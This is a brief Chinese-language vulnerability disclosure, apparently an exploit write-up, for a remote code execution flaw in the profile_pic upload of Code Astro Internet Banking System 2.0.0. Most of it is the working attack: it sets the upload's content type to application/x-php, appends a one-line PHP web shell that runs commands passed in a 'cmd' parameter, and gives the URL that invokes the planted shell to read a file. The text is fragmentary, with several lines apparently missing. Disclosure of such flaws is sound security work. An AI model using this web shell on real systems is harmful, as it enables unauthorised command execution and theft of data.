Code Astro Internet Banking System 2.0.0 中存在一个**远程代码执行(RCE)**漏洞,该漏洞源于 pages_view_client.php 中 profile_pic 参数的文件上传验证不严格。攻击者可以通过修改上传请求绕过安全检查,从而实现任意代码执行。
pages_view_client.php 中的 profile_pic 参数


application/x-php,并追加恶意 PHP 代码:<?php system($_GET['cmd']); ?>


/admin/dist/img/ 目录:http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt
